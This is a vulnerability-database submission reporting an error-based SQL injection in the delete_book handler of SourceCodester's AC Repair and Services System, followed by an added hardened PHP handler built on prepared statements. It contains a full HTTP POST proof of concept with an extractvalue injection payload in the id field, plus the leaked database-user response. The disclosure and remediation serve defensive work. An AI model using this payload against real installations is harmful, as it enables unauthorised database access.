Submission #180827: SourceCodester AC Repair and Services System HTTP POST Request sql injection in Master.php (Info)

Title: SourceCodester AC Repair and Services System HTTP POST Request sql injection in Master.php
Description: I found a SQL injection in SourceCodester AC Repair and Services System (https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html). It is a SQL injection in url/classes/Master.php?f=delete_book.

    POST /php-acrss/classes/Master.php?f=delete_book HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------25039842273186474810708140780
    Content-Length: 906
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/php-acrss/admin/?page=bookings/manage_booking
    Cookie: PHPSESSID=sg18q6cststuaq0t07v6hdppgc
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin

    -----------------------------25039842273186474810708140780
    Content-Disposition: form-data; name="id"

    1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
    -----------------------------25039842273186474810708140780
    Content-Disposition: form-data; name="fullname"

    1
    -----------------------------25039842273186474810708140780
    Content-Disposition: form-data; name="email"

    1
    -----------------------------25039842273186474810708140780
    Content-Disposition: form-data; name="contact"

    1
    -----------------------------25039842273186474810708140780
    Content-Disposition: form-data; name="address"

    1
    -----------------------------25039842273186474810708140780
    Content-Disposition: form-data; name="services[]"

    1
    -----------------------------25039842273186474810708140780
    Content-Disposition: form-data; name="status"

    1
    -----------------------------25039842273186474810708140780--

And it returns: {"status":"failed","error":"XPATH syntax error: '~admin@localhost~'"}. Obviously, there is an error injection vulnerability here due to insufficient filtering of the id parameter. My suggestion for modification is to use mysqli_real_escape_string() to protect the controllable id parameter from malicious exploitation by hackers resulting in SQL error injection.
Source: https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html
User: fushuling (UID 45488)
Submitted: 2023-07-11 05:42 PM (3 years ago)
Moderation: 2023-07-13 11:49 AM (2 days later)
Status: Accepted
VulDB Entry: 234012 [SourceCodester AC Repair and Services System 1.0 HTTP POST Request Master.php?f=delete_book id SQL injection]
Points: 20
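The submission reports two defects working together: the id value is concatenated into a DELETE statement, and the raw database error text is returned to the client in the JSON response, which is what turns a blind fault into the readable "XPATH syntax error" output shown above. The following is an added example of a hardened delete_book handler written for this page; it is not the project's code. The table and column names (booking_list, id), the $conn mysqli handle and the response shape are assumptions, chosen to match the request and response in the report.

```php
<?php
// Added example, not the project's code. Assumed: a mysqli handle $conn,
// a table `booking_list` with an integer primary key `id`, and a JSON
// response of the form {"status": ...} as seen in the submission.
declare(strict_types=1);

// Vulnerable pattern the report describes (for contrast, do not use):
//   $sql = "DELETE FROM booking_list WHERE id = '{$_POST['id']}'";
//   if (!$conn->query($sql)) { $resp['error'] = $conn->error; }
// Both the string concatenation and the echoed $conn->error are defects.

function delete_booking(mysqli $conn, string $rawId): array
{
    // Validate shape first: a booking id is a positive integer. Anything
    // else (quotes, functions, comments) is rejected before touching SQL.
    if (!preg_match('/^\d{1,10}$/', $rawId)) {
        return ['status' => 'failed', 'error' => 'Invalid booking id'];
    }
    $id = (int) $rawId;

    // Parameterised statement: the id is bound as an integer, so it can
    // never alter the query text regardless of its content.
    $stmt = $conn->prepare('DELETE FROM booking_list WHERE id = ?');
    if ($stmt === false) {
        // Log details server-side; never return $conn->error to the client.
        error_log('delete_booking prepare failed: ' . $conn->error);
        return ['status' => 'failed', 'error' => 'Internal error'];
    }
    $stmt->bind_param('i', $id);

    if (!$stmt->execute()) {
        error_log('delete_booking execute failed: ' . $stmt->error);
        $stmt->close();
        return ['status' => 'failed', 'error' => 'Internal error'];
    }
    $affected = $stmt->affected_rows;
    $stmt->close();

    return $affected > 0
        ? ['status' => 'success']
        : ['status' => 'failed', 'error' => 'No such booking'];
}

// Usage inside the f=delete_book branch (constructed):
// header('Content-Type: application/json');
// echo json_encode(delete_booking($conn, (string) ($_POST['id'] ?? '')));
```

Escaping with mysqli_real_escape_string(), as the submitter suggests, also stops the quoted payload above, but a bound integer parameter removes the whole class of string-context injection rather than one encoding of it, and keeping database error text out of the response removes the error-based channel even if some other query is left unfixed. A defender can confirm the fix by replaying the reported request and checking that the response carries no SQL or XPATH error text.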
